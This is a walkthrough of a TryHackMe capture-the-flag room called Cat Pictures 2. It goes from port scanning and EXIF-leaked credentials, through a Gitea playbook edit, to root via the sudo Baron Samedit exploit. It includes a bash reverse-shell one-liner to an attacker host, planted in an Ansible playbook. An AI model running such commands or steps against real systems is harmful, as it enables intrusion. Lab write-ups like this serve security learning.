This is a walkthrough of the Cat Pictures 2 CTF from TryHackMe. The room can be accessed here.

I started by running an Nmap scan to identify open ports on the target machine:

nmap -sV -sC -p- <#TARGETIP> -o nmap

The scan revealed the following open ports:

• 22 - OpenSSH 7.6p1
• 80 - Nginx 1.4.6 (Lychee version 3.1.1 photo album with cat pictures)
• 222 - OpenSSH 9.0 (Unusual port)
• 1337 - OliveTin (Web interface to run predefined shell commands)
• 3000 - Gitea (Lightweight DevOps platform)
• 8080 - Nginx default webpage (Possibly with subdirectories)

I began exploring the web applications hosted on different ports:

• Port 80: Found a Lychee photo album with cat pictures.

• Port 1337: Discovered OliveTin, a web interface to execute scripts and run Ansible Playbooks.

• Port 3000: Accessed Gitea, a platform that might be hosting scripts and runbooks.

  

• Port 8080: Default Nginx webpage, further inspection may reveal subdirectories.

  

After running gobuster and checking for vulnerabilities, nothing significant was found. So, I focused on the cat pictures hosted on port 80.

I downloaded all the cat pictures and checked them for exif data using exiftool. One picture revealed interesting information of a text file on a subdomain of one of the web applications:

Visiting the URL led me to a text file with the following information:

I managed to gain access to the website with the credentials from the text file and explored the user's repository, where I found flag1.txt (1/3 flags).

Next, I inspected the playbook.yaml file and noticed it contains a shell command: shell: echo hi.

Knowing that OliveTin on port 1337 allows running Ansible Playbooks, I replaced the command with simple bash reverse shell payload from RevShells.com.

bash -i >& /dev/tcp/<#ATTACKERIP>/<#ATTACKERPORT> 0>&1

Setting up a NetCat listener and clicking "Run Ansible Playbook" triggered the payload, which gave me a shell on the box. Exploring the user directory file gave me another text file named flag2.txt (2/3 flags).

With a reverse shell on the target machine, I looked around for interesting files and uploaded linpeas.sh to find vulnerabilities. One stood out: [CVE-2021-3156] sudo Baron Samedit.

To exploit this, I downloaded the exploit, uploaded it to the target machine, compiled it with make, and executed the ./sudo-hax-me-a-sandwich outfile to gain root access.

From here, I moved to the /root file directory and found the flag3.txt (3/3 flags).

Thanks for checking out my writeup! Feel free to reach out with any questions or comments.

If you have any feedback, please reach out to me at [email protected].